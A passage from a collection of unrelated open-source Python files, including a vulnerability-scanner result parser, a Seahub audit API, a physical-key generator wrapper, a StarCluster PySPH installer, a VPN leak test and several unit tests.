# 其他的数据可能是自定义的,就单独拿出来
not_extra_key = ["request", "response", "param", "payload", "url"]
for k, v in detail.items():
for item in not_extra_key:
if item in k:
break
else:
extra[k] = v
vuln = WebVuln(create_time=datetime.fromtimestamp(data["create_time"] / 1000), plugin=data["plugin"],
vuln_class=data["vuln_class"],
url=data["target"]["url"], param=param, request=request, response=response, extra=extra,
raw_json=data)
dispatch_web_vuln(instance, vuln)
def process_statistics(instance, data):
"""将统计数据 json 转换为相关 json"""
s = Statistics(num_found_urls=data["num_found_urls"],
num_scanned_urls=data["num_scanned_urls"],
num_sent_http_requests=data["num_sent_http_requests"],
average_response_time=data["average_response_time"],
ratio_failed_http_requests=data["ratio_failed_http_requests"],
ratio_progress=data["ratio_progress"],
raw_json=data)
dispatch_statistics(instance, s)
def process_host_vuln(instance, data):
"""将服务漏洞 json 转换为相关 json"""
detail = data["detail"]
extra = {}
not_extra_key = ["host", "port"]
for k, v in detail.items():
for item in not_extra_key:
if item in k:
break
else:
extra[k] = v
vuln = ServiceVuln(create_time=datetime.fromtimestamp(data["create_time"] / 1000), plugin=data["plugin"],
vuln_class=data["vuln_class"], host=detail["host"], port=detail["port"],
extra=extra, raw_json=data)
dispatch_service_vuln(instance, vuln)
|
seahub/api2/endpoints/admin/file_audit.py | MJochim/seahub | 420 | 12658665 | # Copyright (c) 2012-2016 Seafile Ltd.
import logging
from rest_framework.authentication import SessionAuthentication
from rest_framework.permissions import IsAdminUser
from rest_framework.response import Response
from rest_framework.views import APIView
from rest_framework import status
from seaserv import seafile_api
from seahub.api2.endpoints.utils import check_time_period_valid, \
get_log_events_by_type_and_time
from seahub.api2.authentication import TokenAuthentication
from seahub.api2.throttling import UserRateThrottle
from seahub.api2.permissions import IsProVersion
from seahub.api2.utils import api_error
from seahub.api2.endpoints.utils import get_user_name_dict, \
get_user_contact_email_dict
from seahub.utils.timeutils import datetime_to_isoformat_timestr
logger = logging.getLogger(__name__)
class FileAudit(APIView):
authentication_classes = (TokenAuthentication, SessionAuthentication)
permission_classes = (IsAdminUser, IsProVersion)
throttle_classes = (UserRateThrottle,)
def get(self, request):
# check the date format, should be like '2015-10-10'
start = request.GET.get('start', None)
end = request.GET.get('end', None)
if not check_time_period_valid(start, end):
error_msg = 'start or end date invalid.'
return api_error(status.HTTP_400_BAD_REQUEST, error_msg)
try:
events = get_log_events_by_type_and_time('file_audit', start, end)
except Exception as e:
logger.error(e)
error_msg = 'Internal Server Error'
return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)
result = []
if events:
# get name/contact_email dict for events user/repo_owner
ev_user_list = []
ev_repo_owner_list = []
for ev in events:
repo_id = ev.repo_id
repo = seafile_api.get_repo(repo_id)
if repo:
ev.repo_name = repo.name
ev.repo_owner = seafile_api.get_repo_owner(repo_id) or \
seafile_api.get_org_repo_owner(repo_id)
else:
ev.repo_name = ''
ev.repo_owner = ''
ev_user_list.append(ev.user)
ev_repo_owner_list.append(ev.repo_owner)
ev_user_name_dict = get_user_name_dict(ev_user_list)
ev_user_contact_email_dict = get_user_contact_email_dict(ev_user_list)
ev_repo_owner_name_dict = get_user_name_dict(ev_repo_owner_list)
ev_repo_owner_contact_email_dict = get_user_contact_email_dict(ev_repo_owner_list)
for ev in events:
result.append({
'repo_id': ev.repo_id,
'repo_name': ev.repo_name,
'repo_owner_email': ev.repo_owner,
'repo_owner_name': ev_repo_owner_name_dict[ev.repo_owner],
'repo_owner_contact_email': ev_repo_owner_contact_email_dict[ev.repo_owner],
'time': datetime_to_isoformat_timestr(ev.timestamp),
'ip': ev.ip,
'file_path': ev.file_path,
'etype': ev.etype,
'user_email': ev.user,
'user_name': ev_user_name_dict[ev.user],
'user_contact_email': ev_user_contact_email_dict[ev.user],
})
return Response(result)
|
sample.py | vzkqwvku/kglab | 388 | 12658669 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import kglab
# create a KnowledgeGraph object
kg = kglab.KnowledgeGraph()
# load RDF from a URL
kg.load_rdf("https://storage.googleapis.com/kglab-tutorial/foaf.rdf", format="xml")
# measure the graph
measure = kglab.Measure()
measure.measure_graph(kg)
print("edges: {}\n".format(measure.get_edge_count()))
print("nodes: {}\n".format(measure.get_node_count()))
# serialize as a string in "Turtle" TTL format
ttl = kg.save_rdf_text()
print("```")
print(ttl[:999])
print("```")
|
packages/pyright-internal/src/tests/samples/genericTypes29.py | sasano8/pyright | 241 | 12658670 |
# This sample tests bidirectional inference when the
# type derives from the expected type and both are
# generic.
from typing import Mapping, Optional, Union
v0: Optional[Mapping[str, Union[int, str]]] = dict([("test1", 1), ("test2", 2)])
v1: Optional[Mapping[str, float]] = dict([("test1", 1), ("test2", 2)])
# This should generate an error because of a type mismatch.
v2: Mapping[str, str] = dict([("test1", 1), ("test2", 2)])
|
bin/keygen.py | 641i130/keygen | 114 | 12658701 | #!/usr/bin/env python3
import argparse
import os
import string
import sys
import subprocess
parser = argparse.ArgumentParser(description='Generates keys.', epilog='All remaining arguments are passed to OpenSCAD.')
parser.add_argument("filename",
help="OpenSCAD source file for the key")
parser.add_argument("-b", "--bitting", dest='bitting',
help="Key bitting")
parser.add_argument("-u", "--outline", dest='outline',
help="Key blank outline")
parser.add_argument("-w", "--warding", dest='warding',
help="Key warding")
parser.add_argument("-o", "--output", dest='output', default="a.stl",
help="Output file (defaults to a.stl)")
(args, remaining) = parser.parse_known_args()
def escape(s):
return s.translate(str.maketrans({'"': '\\"',
'\\': '\\\\'}));
scad = os.environ.get("SCAD", "openscad")
opts = []
if args.bitting is not None:
opts += ["-D", 'bitting="{}"'.format(escape(args.bitting))]
if args.outline is not None:
opts += ["-D", 'outline="{}"'.format(escape(args.outline))]
if args.warding is not None:
opts += ["-D", 'warding="{}"'.format(escape(args.warding))]
r = subprocess.call([scad, args.filename, "-o", args.output] + opts + remaining)
sys.exit(r)
|
.workshop/jupyterhub_config.py | blues-man/lab-tekton-pipelines | 109 | 12658702 | os.environ["OPENSHIFT_PROJECT"] = "{username}" |
test/hlt/pytest/python/com/huawei/iotplatform/client/dto/BatchTaskCreateOutDTO.py | yuanyi-thu/AIOT- | 128 | 12658781 | class BatchTaskCreateOutDTO(object):
def __init__(self):
self.taskID = None
def getTaskID(self):
return self.taskID
def setTaskID(self, taskID):
self.taskID = taskID
|
desktop_local_tests/windows/test_windows_packet_capture_disrupt_enable_new_adapter.py | UAEKondaya1/expressvpn_leak_testing | 219 | 12658792 | <reponame>UAEKondaya1/expressvpn_leak_testing
from desktop_local_tests.local_packet_capture_test_case_with_disrupter import LocalPacketCaptureTestCaseWithDisrupter
from desktop_local_tests.windows.windows_enable_new_adapter_disrupter import WindowsEnableNewAdapterDisrupter
class TestWindowsPacketCaptureDisruptEnableNewAdapter(LocalPacketCaptureTestCaseWithDisrupter):
'''Summary:
Tests whether traffic leaving the user's device leaks outside of the VPN tunnel when a higher
priority network adapter becomes active after connecting.
Details:
The test first identifies the highest priority adapter and disables it. It then connects to the
VPN and re-enables that adapter. The test looks for leaking traffic once the interface has been
disabled.
Discussion:
    There are several ways in which an adapter could become active after connect:
* The adapter is "enabled" via Network Connections (in Control Panel)
* The adapter is enabled but there's no connectivity, e.g. the Ethernet cable is unplugged or
Wi-Fi isn't connected to a Wi-Fi network. We refer to this situation as the adapter having
"no network".
* The adapter never existed in the first place and is created after connect.
This test uses the first method to disable/re-enable the adapter to test for leaks. The other
two scenarios are valid test cases and should also be implemented.
Weaknesses:
Packet capture tests can be noisy. Traffic can be detected as a leak but in actual fact may not
be. For example, traffic might go to a server owned by the VPN provider to re-establish
connections. In general this test is best used for manual exploring leaks rather than for
automation.
Scenarios:
Requires two active adapters.
TODO:
Add tests for inactive and newly created adapters.
'''
def __init__(self, devices, parameters):
super().__init__(WindowsEnableNewAdapterDisrupter, devices, parameters)
|
tests/utils.py | mariot/djangorestframework-api-key | 462 | 12658793 | import typing
from rest_framework.decorators import api_view, permission_classes
from rest_framework.permissions import BasePermission
from rest_framework.response import Response
def create_view_with_permissions(
*classes: typing.Type[BasePermission],
) -> typing.Callable:
@api_view()
@permission_classes(classes)
def view(*args: typing.Any) -> Response:
return Response()
return view
|
paper/check-genome-true-positives.py | zihhuafang/slivar_vep105 | 162 | 12658796 | <gh_stars>100-1000
import toolshed
import collections
import hashlib
slivar_found = collections.defaultdict(list)
# first file is tsv from slivar
for d in toolshed.reader(1):
slivar_found[d["sample_id"]].append(d["chr:pos:ref:alt"])
shared_affected = 0
shared_affected_solved = 0
exact_match = 0
sv_del = 0
oocyte = 0
indel_plus_sv_comphet = 0
# 2nd file is participant_details.tsv
for d in toolshed.reader(2):
sample_id = d["entity:participant_details_id"]
if sample_id not in slivar_found: continue
if d["07_affected_status"] != "Affected": continue
shared_affected += 1
key = "chr%s:%s:%s:%s" % (d["13_Chrom-1"], d["14_Pos-1"], d["15_Ref-1"], d["16_Alt-1"])
if key == "chr:::": continue
shared_affected_solved += 1
if key in slivar_found[sample_id]:
print("OK", sample_id, key)
exact_match += 1
else:
sha = hashlib.sha256(sample_id.encode()).hexdigest()
#print("WTF", sample_id, key)
if key.endswith("del"):
sv_del += 1
elif sha in (
"c1b669b32e2b899a15bcd8e5d3e2cc9f5eb457a1b8a1c27fce2ab8f26750c050",
"8145446cdae4964156aefbb0eb1ab03f2866905de14942cffedc48b782de5086"):
oocyte += 1
elif sha in (
"2b2f722dcb68c22c654c4cc2a9d8db8bda08a88461d5d5d7d89c985ba726eb62",
"c52f9645ec80ce4c0c712bb4d8fad246e864b04d53ba94e9a29e3aac15f1985c",
):
indel_plus_sv_comphet += 1
elif sha == "6503b96da638ddab193fa7cbc1e5c20d626f5d2dda7dabe74b09ed4d3e2a677f":
print("mom:0/0 dad:0/1 kid:1/1 (because of sv deletion but other filters passed)")
elif sha == "8d853c417e5d02c5362e0ddce3666689f2feb8672e2293ff9483d4bd6d7ead42":
print(sample_id, key)
print("X. ref: CACCCTCCACGAT")
print("X. reported by RGP: pos:802 var:TCCAC/A")
print("X. found by our pipelines:")
print("X. pos:802 CCCT/C")
print("X. pos:808 AC/A")
else:
print("BAD", sample_id, key)
1/0
print("shared_affected", shared_affected)
print("shared_affected_solved: ", shared_affected_solved)
print("exact_match:", exact_match)
print("SV deletion (not sought here):", sv_del)
print("autosome het 2 girls shared with dad", oocyte)
print("comphet missed because 1 side was deletion:", indel_plus_sv_comphet)
"""
entity:participant_details_id 01_project_id 02_family_id 03_Individual_ID 06_sex 07_affected_status 08_phenotype_description 09_hpo_present 29_Date-Uploaded 04_paternal_id 05_maternal_id 11_Gene-1 12_Zygosity-1 13_Chrom-1 14_Pos-1 15_Ref-1 16_Alt-1 17_hgvsc-1 18_hgvsp-1 19_Transcript-1 10_hpo_absent 20_Gene-2 21_Zygosity-2 22_Chrom-2 23_Pos-2 24_Ref-2 25_Alt-2 26_hgvsc-2 27_hgvsp-2 28_Transcript-2 31_Notes 30_Other_seq_data
RGP_1003_3 Rare Genomes Project_Genomes RGP_1003 RGP_1003_3 Male Affected Limb-girdle muscular dystrophy HP:0003236 (Elevated serum creatine kinase)|HP:0012378 (Fatigue)|HP:0003325 (Limb-girdle muscle weakness)|HP:0003701 (Proximal muscle weakness) 3/1/2019
RGP_1004_3 Rare Genomes Project_Genomes RGP_1004 RGP_1004_3 Female Affected Limb-girdle muscular dystrophy HP:0012432 (Chronic fatigue)|HP:0006785 (Limb-girdle muscular dystrophy)|HP:0001324 (Muscle weakness)|HP:0003202 (Skeletal muscle atrophy) 3/1/2019
RGP_1004_4 Rare Genomes Project_Genomes RGP_1004 RGP_1004_4 Female Affected Limb-girdle muscular dystrophy HP:0006785 (Limb-girdle muscular dystrophy) 3/1/2019
RGP_1004_5 Rare Genomes Project_Genomes RGP_1004 RGP_1004_5 Female Affected Limb-girdle muscular dystrophy HP:0006785 (Limb-girdle muscular dystrophy) 3/1/2019
RGP_1006_3 Rare Genomes Project_Genomes RGP_1006 RGP_1006_3 Male Affected Myopathy HP:0002355 (Difficulty walking)|HP:0003473 (Fatigable weakness)|HP:0002359 (Frequent falls)|HP:0030237 (Hand muscle weakness)|HP:0007340 (Lower limb muscle weakness)|HP:0001324 (Muscle weakness)|HP:0003484 (Upper limb muscle weakness) 3/1/2019
RGP_1012_1 Rare Genomes Project_Genomes RGP_1012 RGP_1012_1 Female Unaffected Overgrowth; autism 3/1/2019
RGP_1012_2 Rare Genomes Project_Genomes RGP_1012 RGP_1012_2 Male Unaffected Overgrowth; autism 8/16/2019
RGP_1012_3 Rare Genomes Project_Genomes RGP_1012 RGP_1012_3 Male Affected Overgrowth; autism HP:0000729 (Autistic behavior)|HP:0001548 (Overgrowth) 3/1/2019 RGP_1012_2 RGP_1012_1
RGP_1013_3 Rare Genomes Project_Genomes RGP_1013 RGP_1013_3 Male Affected Myopathy HP:0003198 (Myopathy) 3/1/2019
"""
|
robogym/mujoco/warning_buffer.py | 0xflotus/robogym | 288 | 12658817 |
import collections
import logging
import mujoco_py.cymj as cymj
logger = logging.getLogger(__name__)
class MujocoErrorException(Exception):
""" Exception raised when mujoco error is called. """
pass
def error_callback(message):
""" Mujoco error callback """
message = message.decode()
full_message = f"MUJOCO ERROR: {message}"
logger.error(full_message)
raise MujocoErrorException(full_message)
# Set it once for all the processes
cymj.set_error_callback(error_callback)
class MjWarningBuffer:
"""
Buffering MuJoCo warnings.
That way they don't cause an exception being thrown which crashes the process,
but at the same time we store them in memory and can process.
One can potentially specify buffer capacity if one wants to use a circular buffer.
"""
def __init__(self, maxlen=None):
self.maxlen = maxlen
self._buffer = collections.deque(maxlen=self.maxlen)
self._prev_user_callback = None
def _intercept_warning(self, warn_bytes):
""" Intercept a warning """
warn = warn_bytes.decode() # Convert bytes to string
logger.warning("MUJOCO WARNING: %s", str(warn))
self._buffer.append(warn)
@property
def warnings(self):
""" Return a list of warnings to the user """
return list(self._buffer)
def enter(self):
""" Enable collecting warnings """
if self._prev_user_callback is None:
self._prev_user_callback = cymj.get_warning_callback()
cymj.set_warning_callback(self._intercept_warning)
def clear(self):
""" Reset warning buffer """
self._buffer.clear()
def exit(self):
""" Stop collecting warnings """
if self._prev_user_callback is not None:
cymj.set_warning_callback(self._prev_user_callback)
self._prev_user_callback = None
def __enter__(self):
""" Enter - context manager magic method """
self.enter()
def __exit__(self, exc_type, exc_val, exc_tb):
""" Exit - context manager magic method """
self.exit()
def __repr__(self):
""" Text representation"""
return "<{} warnings:{}>".format(self.__class__.__name__, len(self.warnings))
|
configs/linear/cifar10_res18.py | xyupeng/ContrastiveCrop | 148 | 12658829 | <reponame>xyupeng/ContrastiveCrop<filename>configs/linear/cifar10_res18.py<gh_stars>100-1000
# model
model = dict(type='ResNet', depth=18, num_classes=10, maxpool=False)
loss = dict(type='CrossEntropyLoss')
# dataset
root = '/path/to/your/dataset'
mean = (0.4914, 0.4822, 0.4465)
std = (0.2023, 0.1994, 0.2010)
batch_size = 512
num_workers = 4
data = dict(
train=dict(
ds_dict=dict(
type='CIFAR10',
root=root,
train=True,
),
trans_dict=dict(
type='cifar_linear',
mean=mean, std=std
),
),
test=dict(
ds_dict=dict(
type='CIFAR10',
root=root,
train=False,
),
trans_dict=dict(
type='cifar_test',
mean=mean, std=std
),
),
)
# training optimizer & scheduler
epochs = 100
lr = 10.0
optimizer = dict(type='SGD', lr=lr, momentum=0.9, weight_decay=0)
lr_cfg = dict( # passed to adjust_learning_rate()
type='MultiStep',
steps=epochs,
lr=lr,
decay_rate=0.1,
decay_steps=[60, 80],
)
# log, load & save
log_interval = 20
work_dir = None
resume = None
load = None
port = 10001
|
chapter2_training/model_db/src/db/schemas.py | sudabon/ml-system-in-actions | 133 | 12658865 | import datetime
from typing import Dict, Optional
from pydantic import BaseModel
class ProjectBase(BaseModel):
project_name: str
description: Optional[str]
class ProjectCreate(ProjectBase):
pass
class Project(ProjectBase):
project_id: int
created_datetime: datetime.datetime
class Config:
orm_mode = True
class ModelBase(BaseModel):
project_id: str
model_name: str
description: Optional[str]
class ModelCreate(ModelBase):
pass
class Model(ModelBase):
model_id: int
created_datetime: datetime.datetime
class Config:
orm_mode = True
class ExperimentBase(BaseModel):
model_id: str
model_version_id: str
parameters: Optional[Dict]
training_dataset: Optional[str]
validation_dataset: Optional[str]
test_dataset: Optional[str]
evaluations: Optional[Dict]
artifact_file_paths: Optional[Dict]
class ExperimentCreate(ExperimentBase):
pass
class ExperimentEvaluations(BaseModel):
evaluations: Dict
class ExperimentArtifactFilePaths(BaseModel):
artifact_file_paths: Dict
class Experiment(ExperimentBase):
experiment_id: int
created_datetime: datetime.datetime
class Config:
orm_mode = True
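# --- Illustrative usage (not part of the original schemas) ---
# A minimal sketch of validating a payload with one of the schemas above,
# assuming pydantic v1 as used by the project; every field value is made up.
if __name__ == "__main__":
    experiment = ExperimentCreate(
        model_id="model_1",
        model_version_id="v1",
        parameters={"lr": 0.01},
        training_dataset="train.csv",
        validation_dataset="val.csv",
        test_dataset="test.csv",
        evaluations={"accuracy": 0.95},
        artifact_file_paths={"model": "/tmp/model.onnx"},
    )
    print(experiment.dict())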
|
polymetis/polymetis/python/polymetis/_version.py | ali-senguel/fairo | 669 | 12658903 | import os
import json
import polymetis
__version__ = ""
# Conda installed: Get version of conda pkg (assigned $GIT_DESCRIBE_NUMBER during build)
if "CONDA_PREFIX" in os.environ and os.environ["CONDA_PREFIX"] in polymetis.__file__:
# Search conda pkgs for polymetis & extract version number
stream = os.popen("conda list | grep polymetis")
for line in stream:
info_fields = [s for s in line.strip("\n").split(" ") if len(s) > 0]
if info_fields[0] == "polymetis": # pkg name == polymetis
__version__ = info_fields[1]
break
# Built locally: Retrieve git tag description of Polymetis source code
else:
# Navigate to polymetis pkg dir, which should be within the git repo
original_cwd = os.getcwd()
os.chdir(os.path.dirname(polymetis.__file__))
# Git describe output
stream = os.popen("git describe --tags")
version_string = [line for line in stream][0]
# Modify to same format as conda env variable GIT_DESCRIBE_NUMBER
version_items = version_string.strip("\n").split("-")
__version__ = f"{version_items[-2]}_{version_items[-1]}"
# Reset cwd
os.chdir(original_cwd)
if not __version__:
raise Exception("Cannot locate Polymetis version!")
|
linked_list_cycle_ii/solution.py | mahimadubey/leetcode-python | 528 | 12658915 | # Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
# @param head, a ListNode
# @return a list node
def detectCycle(self, head):
if head is None or head.next is None:
return None
slow = head
fast = head
while fast is not None and fast.next is not None:
slow = slow.next
fast = fast.next.next
if fast == slow:
break
# No cycle
if fast is None or fast.next is None:
return None
# Has a cycle, put `slow` back to head
slow = head
while True:
if fast == slow:
break
slow = slow.next
fast = fast.next
return slow
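if __name__ == '__main__':
    # Added self-check (not part of the original solution). Why resetting `slow` to the
    # head works: if the head is `a` nodes before the cycle entry and the pointers meet
    # `b` nodes into the cycle, then a == k * cycle_len - b for some k, so two pointers
    # advancing one step at a time from the head and from the meeting point reach the
    # cycle entry together.
    class ListNode:
        def __init__(self, x):
            self.val = x
            self.next = None
    # Build 1 -> 2 -> 3 -> 4 -> back to 3 (the cycle starts at the node holding 3).
    nodes = [ListNode(i) for i in range(1, 5)]
    for a, b in zip(nodes, nodes[1:]):
        a.next = b
    nodes[-1].next = nodes[2]
    entry = Solution().detectCycle(nodes[0])
    assert entry is nodes[2]
    print("cycle starts at value", entry.val)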
|
examples/sharepoint/pages/create_modern_page.py | theodoriss/Office365-REST-Python-Client | 544 | 12658945 | <reponame>theodoriss/Office365-REST-Python-Client<filename>examples/sharepoint/pages/create_modern_page.py
from office365.sharepoint.client_context import ClientContext
from office365.sharepoint.publishing.site_page import SitePage
from tests import test_client_credentials, test_team_site_url
ctx = ClientContext(test_team_site_url).with_credentials(test_client_credentials)
new_page = ctx.site_pages.pages.add()
new_page.save_draft(title="Latest News 456")
new_page.publish().execute_query()
pages = ctx.site_pages.pages.get().execute_query()
for page in pages: # type: SitePage
print(page.file_name)
|
grow/deployments/destinations/local_test.py | denmojo/pygrow | 335 | 12658957 | <reponame>denmojo/pygrow
from . import local
import unittest
class LocalDestinationTestCase(unittest.TestCase):
def test_out_dir(self):
config = local.Config(out_dir='~/test/')
destination = local.LocalDestination(config)
# Weakly verify out_dir is expanded.
self.assertNotIn('~', destination.out_dir)
if __name__ == '__main__':
unittest.main()
|
starcluster/sc_pysph.py | nauaneed/pysph | 293 | 12658974 | from starcluster.clustersetup import DefaultClusterSetup
from starcluster.logger import log
class PySPHInstallerBase(DefaultClusterSetup):
PYSPH_PROFILE = "/etc/profile.d/pysph.sh"
PYSPH_HOSTS = "/home/pysph/PYSPH_HOSTS"
PYSPH_USER = "pysph"
def _create_env(self, master):
master.ssh.execute(
r"""
echo $HOME
if [ ! -d ~/pysph_env ]; then
mkdir ~/pysph_env &&
virtualenv --system-site-packages ~/pysph_env;
fi
"""
)
def _install_pysph(self, master):
commands = r"""
. ~/pysph_env/bin/activate
if ! python -c "import pysph" &> /dev/null; then
export USE_TRILINOS=1
export ZOLTAN_INCLUDE=/usr/include/trilinos
export ZOLTAN_LIBRARY=/usr/lib/x86_64-linux-gnu
cd ~ &&
git clone https://github.com/pypr/pysph &&
cd pysph &&
python setup.py install
fi
"""
master.ssh.execute(commands)
def _configure_profile(self, node):
pysph_profile = node.ssh.remote_file(self.PYSPH_PROFILE, 'w')
pysph_profile.write("test -e ~/.bashrc && . ~/.bashrc")
pysph_profile.close()
class PySPHInstaller(PySPHInstallerBase):
def run(self, nodes, master, user, user_shell, volumes):
aliases = [n.alias for n in nodes]
log.info("Configuring PYSPH Profile")
for node in nodes:
self.pool.simple_job(self._configure_profile,
(node,))
self.pool.wait(len(nodes))
master.ssh.switch_user(self.PYSPH_USER)
log.info("Creating virtual environment")
self._create_env(master)
master.ssh.execute("echo '. ~/pysph_env/bin/activate' > ~/.bashrc")
log.info("Installing PySPH")
self._install_pysph(master)
log.info("Adding nodes to PYSPH hosts file")
pysph_hosts = master.ssh.remote_file(self.PYSPH_HOSTS, 'w')
pysph_hosts.write('\n'.join(aliases) + '\n')
def on_add_node(self, new_node, nodes, master, user, user_shell, volumes):
log.info("Configuring PYSPH Profile")
self._configure_profile(new_node)
master.ssh.switch_user(self.PYSPH_USER)
log.info("Adding %s to PYSPH hosts file" % new_node.alias)
pysph_hosts = master.ssh.remote_file(self.PYSPH_HOSTS, 'a')
pysph_hosts.write(new_node.alias + '\n')
pysph_hosts.close()
def on_remove_node(self, remove_node, nodes, master,
user, user_shell, volumes):
        master.ssh.switch_user(self.PYSPH_USER)
log.info("Removing %s from PYSPH hosts file" % remove_node.alias)
master.ssh.remove_lines_from_file(self.PYSPH_HOSTS, remove_node.alias)
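# Example StarCluster configuration for enabling this plugin (added for reference;
# section and option names follow common StarCluster plugin conventions and are an
# assumption, not taken from this repository):
#
#   [plugin pysph_installer]
#   setup_class = sc_pysph.PySPHInstaller
#
#   [cluster pysph_cluster]
#   plugins = pysph_installer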
|
endtoend_tests/forseti/explain/why_denied_test.py | aarontp/forseti-security | 921 | 12658976 | <filename>endtoend_tests/forseti/explain/why_denied_test.py
# Copyright 2020 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import re
from endtoend_tests.helpers.forseti_cli import ForsetiCli
class TestExplainerWhyDenied:
"""Explainer why_denied tests."""
@pytest.mark.client
@pytest.mark.e2e
@pytest.mark.explainer
def test_why_denied(self, forseti_cli: ForsetiCli, forseti_model_readonly,
forseti_server_service_account: str,
project_id: str):
"""Test why_denied for why the Forseti SA doesn't have the
storage.buckets.delete permission.
Args:
forseti_cli (ForsetiCli): Instance of the forseti cli helper
forseti_model_readonly (Tuple): Model name & process result
forseti_server_service_account (str): Server service account email
project_id (str): Project id being scanned
"""
# Arrange
model_name, _, _ = forseti_model_readonly
forseti_cli.model_use(model_name=model_name)
# Act
result = forseti_cli.explainer_why_denied(
forseti_server_service_account, f'project/{project_id}',
permissions=['storage.buckets.delete'])
# Assert
assert result.returncode == 0, f'Forseti stdout: {str(result.stdout)}'
assert re.search(r'roles\/cloudmigration.inframanager', str(result.stdout))
assert re.search(r'roles\/owner', str(result.stdout))
assert re.search(r'roles\/storage.admin', str(result.stdout))
|
setup.py | nessessence/dropblock | 556 | 12658999 | <filename>setup.py
from setuptools import setup, find_packages
with open('requirements.txt', encoding='utf-8') as f:
required = f.read().splitlines()
with open('README.md', encoding='utf-8') as f:
long_description = f.read()
setup(
name='dropblock',
version='0.3.0',
packages=find_packages(),
long_description=long_description,
long_description_content_type='text/markdown',
install_requires=required,
url='https://github.com/miguelvr/dropblock',
license='MIT',
author='<NAME>',
author_email='<EMAIL>',
description='Implementation of DropBlock: A regularization method for convolutional networks in PyTorch. '
)
|
tests/test_additional_commands.py | ils-nsolanki/dev-buildpack | 133 | 12659009 | <reponame>ils-nsolanki/dev-buildpack
from build_pack_utils import utils
extn = utils.load_extension('lib/additional_commands')
class TestAdditionalCommandsExtension(object):
def test_no_additional_commands(self):
ctx = {}
tmp = extn.preprocess_commands(ctx)
assert tmp == []
def test_one_command_as_string(self):
ctx = {
'ADDITIONAL_PREPROCESS_CMDS': 'env'
}
tmp = extn.preprocess_commands(ctx)
assert len(tmp) == 1
assert tmp[0] == ['env']
def test_one_additional_command(self):
ctx = {
'ADDITIONAL_PREPROCESS_CMDS': ['env']
}
tmp = extn.preprocess_commands(ctx)
assert len(tmp) == 1
assert tmp[0] == ['env']
def test_two_additional_commands(self):
ctx = {
'ADDITIONAL_PREPROCESS_CMDS': ['env', 'run_something']
}
tmp = extn.preprocess_commands(ctx)
assert len(tmp) == 2
assert tmp[0] == ['env']
assert tmp[1] == ['run_something']
def test_command_with_arguments_as_string(self):
ctx = {
'ADDITIONAL_PREPROCESS_CMDS': ['echo "Hello World"']
}
tmp = extn.preprocess_commands(ctx)
assert len(tmp) == 1
assert tmp[0] == ['echo "Hello World"']
def test_command_with_arguments_as_list(self):
ctx = {
'ADDITIONAL_PREPROCESS_CMDS': [['echo', '"Hello World!"']]
}
tmp = extn.preprocess_commands(ctx)
assert len(tmp) == 1
assert len(tmp[0]) == 2
assert tmp[0][0] == 'echo'
assert tmp[0][1] == '"Hello World!"'
|
tests/unit/test_cli.py | ClementPruvot/slo-generator | 243 | 12659017 | <gh_stars>100-1000
# Copyright 2019 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import unittest
from mock import patch
from click.testing import CliRunner
from slo_generator.cli import main
from slo_generator.utils import load_config
from .test_stubs import CTX, mock_sd
cwd = os.path.dirname(os.path.abspath(__file__))
root = os.path.dirname(os.path.dirname(cwd))
class TestCLI(unittest.TestCase):
def setUp(self):
for key, value in CTX.items():
os.environ[key] = value
slo_config = f'{root}/samples/cloud_monitoring/slo_gae_app_availability.yaml' # noqa: E501
config = f'{root}/samples/config.yaml'
self.slo_config = slo_config
self.slo_metadata_name = load_config(slo_config,
ctx=CTX)['metadata']['name']
self.config = config
self.cli = CliRunner()
@patch('google.api_core.grpc_helpers.create_channel',
return_value=mock_sd(8))
def test_cli_compute(self, mock):
args = ['compute', '-f', self.slo_config, '-c', self.config]
result = self.cli.invoke(main, args)
self.assertEqual(result.exit_code, 0)
@patch('google.api_core.grpc_helpers.create_channel',
return_value=mock_sd(40))
def test_cli_compute_folder(self, mock):
args = [
'compute', '-f', f'{root}/samples/cloud_monitoring', '-c',
self.config
]
result = self.cli.invoke(main, args)
self.assertEqual(result.exit_code, 0)
def test_cli_compute_no_config(self):
args = [
'compute', '-f', f'{root}/samples', '-c',
f'{root}/samples/config.yaml'
]
result = self.cli.invoke(main, args)
self.assertEqual(result.exit_code, 1)
def test_cli_api(self):
# TODO: Write test
pass
def test_cli_migrate(self):
# TODO: Write test
pass
if __name__ == '__main__':
unittest.main()
|
tests/unit/containers/test_envvarcollector.py | senstb/aws-elastic-beanstalk-cli | 110 | 12659029 | <gh_stars>100-1000
# Copyright 2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License'). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the 'license' file accompanying this file. This file is
# distributed on an 'AS IS' BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from ebcli.containers.envvarcollector import EnvvarCollector
from mock import patch
from unittest import TestCase
class TestEnvvarCollector(TestCase):
def test_empty_environment(self):
self.assertDictEqual({}, EnvvarCollector().map)
self.assertSetEqual(set(), EnvvarCollector().to_remove)
def test_merge_non_overlapping_envs(self):
env0 = EnvvarCollector({'a': '0', 'b': '1'})
env1 = EnvvarCollector({'c': '3', 'd': '4'})
expected_envvars = {'a': '0', 'b': '1', 'c': '3', 'd': '4'}
self.assertDictEqual(expected_envvars, env0.merge(env1).filtered().map)
self.assertDictEqual(expected_envvars, env1.merge(env0).filtered().map)
self.assertSetEqual(set(), env0.merge(env1).to_remove)
self.assertSetEqual(set(), env1.merge(env0).to_remove)
def test_merge_overlapping_and_vars_to_remove(self):
